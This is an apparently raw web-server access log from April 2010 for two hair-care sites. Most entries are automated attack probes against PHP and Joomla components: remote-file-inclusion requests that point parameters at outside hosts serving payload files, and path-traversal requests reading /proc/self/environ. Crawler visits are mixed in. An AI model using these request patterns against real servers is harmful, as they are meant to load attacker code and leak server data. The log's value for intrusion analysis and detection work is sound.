207.58.185.118 - - [18/Apr/2010:22:22:38 -0700] "GET /logs/access_100412.log///?_SERVER[DOCUMENT_ROOT]=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.58.185.118 - - [18/Apr/2010:22:23:13 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.valmarko.lv/ru/cache/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.75.251.187 - - [18/Apr/2010:22:26:02 -0700] "GET /appserv/main.php?appserv_root=http://sun-mart.co.kr/product_data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.75.251.187 - - [18/Apr/2010:22:26:02 -0700] "GET /logs/access_091214.log//appserv/main.php?appserv_root=http://sun-mart.co.kr/product_data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.75.251.187 - - [18/Apr/2010:22:26:02 -0700] "GET /logs//appserv/main.php?appserv_root=http://sun-mart.co.kr/product_data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.11.75.68 - - [18/Apr/2010:22:31:48 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.freehairsecrets.com"
200.11.75.68 - - [18/Apr/2010:22:31:49 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.freehairsecrets.com"
200.11.75.68 - - [18/Apr/2010:22:33:39 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
200.11.75.68 - - [18/Apr/2010:22:33:39 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
76.73.79.11 - - [18/Apr/2010:22:40:14 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:40:25 -0700] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:40:25 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:40:25 -0700] "GET /logs/access.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:42:04 -0700] "GET /content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:42:04 -0700] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:42:04 -0700] "GET /logs/access.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [18/Apr/2010:22:42:45 -0700] "GET /logs/access_100201.log%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.11.75.68 - - [18/Apr/2010:22:47:10 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "growlonghairfast.com"
200.11.75.68 - - [18/Apr/2010:22:47:10 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
67.195.112.151 - - [18/Apr/2010:22:47:41 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [18/Apr/2010:22:47:58 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:22:50:52 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:50:54 -0700] "GET /logs/access_091123.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:50:54 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:51:07 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:51:08 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:51:08 -0700] "GET /logs/access_091123.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:51:38 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:51:41 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:22:52:05 -0700] "GET /logs/access_091123.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.11.75.68 - - [18/Apr/2010:22:56:30 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.freehairsecrets.com"
200.11.75.68 - - [18/Apr/2010:22:56:35 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.freehairsecrets.com"
78.26.187.208 - - [18/Apr/2010:22:59:00 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
78.26.187.208 - - [18/Apr/2010:22:59:00 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
76.73.79.11 - - [18/Apr/2010:23:00:39 -0700] "GET /logs/access_100412.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
76.73.79.11 - - [18/Apr/2010:23:00:40 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
76.73.79.11 - - [18/Apr/2010:23:00:40 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
216.104.36.82 - - [18/Apr/2010:23:01:37 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:01:37 -0700] "GET /logs/access_091207.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:01:39 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:01:41 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:01:41 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:01:43 -0700] "GET /logs/access_091207.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:02:26 -0700] "GET /logs/access_091207.log%20%20//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:02:26 -0700] "GET /logs//ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
216.104.36.82 - - [18/Apr/2010:23:02:26 -0700] "GET /ask_password.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
76.73.79.11 - - [18/Apr/2010:23:07:35 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
213.251.175.42 - - [18/Apr/2010:23:12:37 -0700] "GET /logs/access.log//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
213.251.175.42 - - [18/Apr/2010:23:12:37 -0700] "GET /index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
213.251.175.42 - - [18/Apr/2010:23:12:37 -0700] "GET /logs//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
213.251.175.42 - - [18/Apr/2010:23:15:21 -0700] "GET /logs/access_100412.log%20//index.php?option=com_extcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:21:50 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:21:50 -0700] "GET /logs/access.log//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:21:51 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:22:10 -0700] "GET /logs/access_100412.log//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:22:21 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:22:21 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:22:21 -0700] "GET /logs/access.log//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:22:43 -0700] "GET /logs/access_100412.log//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:15 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:15 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:15 -0700] "GET /logs/access.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:57 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:57 -0700] "GET /logs/access.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:23:57 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:26:37 -0700] "GET /logs/access_100412.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [18/Apr/2010:23:27:16 -0700] "GET /logs/access_100412.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.26.187.208 - - [18/Apr/2010:23:31:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
78.26.187.208 - - [18/Apr/2010:23:31:20 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
69.175.7.34 - - [18/Apr/2010:23:32:03 -0700] "GET /logs/info.php?dir=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.7.34 - - [18/Apr/2010:23:32:03 -0700] "GET /logs/access_100412.log/info.php?dir=http://smash1.fileave.com/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.7.34 - - [18/Apr/2010:23:32:03 -0700] "GET /info.php?dir=http://smash1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:42 -0700] "GET /logs/access.log%20%20/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:42 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:42 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:44 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:44 -0700] "GET /logs/access.log%20%20/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:43:44 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.112.151 - - [18/Apr/2010:23:50:21 -0700] "GET /logs/access_100412.log HTTP/1.0" 200 2139776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:50:38 -0700] "GET /logs/access.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:50:47 -0700] "GET /logs/access.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:51:02 -0700] "GET /logs/access_100412.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.172.49.129 - - [18/Apr/2010:23:51:04 -0700] "GET /logs/access_100412.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
184.73.9.35 - - [18/Apr/2010:23:53:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.9.35 - - [18/Apr/2010:23:53:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=346 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
118.221.140.5 - - [18/Apr/2010:23:59:03 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://adolfoalban.com/idrose.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
118.221.140.5 - - [18/Apr/2010:23:59:03 -0700] "GET /logs/access.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://adolfoalban.com/idrose.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
118.221.140.5 - - [18/Apr/2010:23:59:03 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://adolfoalban.com/idrose.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:02:46 -0700] "GET /include/mail.inc.php?root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:02:46 -0700] "GET /logs/access_100412.log//include/mail.inc.php?root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:02:46 -0700] "GET /logs//include/mail.inc.php?root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [19/Apr/2010:00:04:06 -0700] "GET /logs/access_100412.log//skin/ggambo7002_board/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [19/Apr/2010:00:04:06 -0700] "GET /skin/ggambo7002_board/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [19/Apr/2010:00:04:06 -0700] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.221.140.5 - - [19/Apr/2010:00:07:28 -0700] "GET /logs/access_100412.log/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://adolfoalban.com/idrose.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "growlonghairfast.com"
200.11.75.68 - - [19/Apr/2010:00:10:24 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.freehairsecrets.com"
200.11.75.68 - - [19/Apr/2010:00:10:24 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.conf.rfipoteka.ru/images/zoom/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.freehairsecrets.com"
67.210.123.80 - - [19/Apr/2010:00:14:53 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.123.80 - - [19/Apr/2010:00:14:53 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.210.123.80 - - [19/Apr/2010:00:14:53 -0700] "GET /logs/access_100412.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [19/Apr/2010:00:15:32 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [19/Apr/2010:00:17:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7737 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:20:20 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:20:20 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
87.106.132.3 - - [19/Apr/2010:00:20:21 -0700] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.113.184.21 - - [19/Apr/2010:00:20:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.113.184.21 - - [19/Apr/2010:00:20:43 -0700] "GET /logs/access_091130.log//skin/zero_vote/error.php?dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.113.184.21 - - [19/Apr/2010:00:20:43 -0700] "GET /skin/zero_vote/error.php?dir=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
38.111.147.84 - - [19/Apr/2010:00:27:31 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.83 - - [19/Apr/2010:00:27:47 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.84 - - [19/Apr/2010:00:30:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14422 HTTP/1.0" 200 333 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.83 - - [19/Apr/2010:00:30:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18185 HTTP/1.0" 200 333 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.84 - - [19/Apr/2010:00:31:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12062 HTTP/1.0" 200 333 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.83 - - [19/Apr/2010:00:31:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20010 HTTP/1.0" 200 333 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
38.111.147.84 - - [19/Apr/2010:00:31:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11152 HTTP/1.0" 200 333 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "freehairsecrets.com"
